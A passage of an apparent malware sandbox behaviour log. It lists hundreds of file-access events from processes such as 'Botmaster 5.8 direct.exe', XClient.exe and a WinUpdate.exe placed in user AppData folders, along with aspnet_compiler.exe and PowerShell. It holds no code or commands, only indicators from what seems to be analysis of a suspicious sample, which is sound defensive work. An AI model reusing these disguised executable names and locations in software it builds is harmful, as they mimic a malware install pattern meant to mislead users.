                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeQueries volume information: C:\Users\user\AppData\Local\WinUpdate.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeQueries volume information: C:\Users\user\AppData\Local\WinUpdate.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.WinForms.dll VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.Core.dll VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
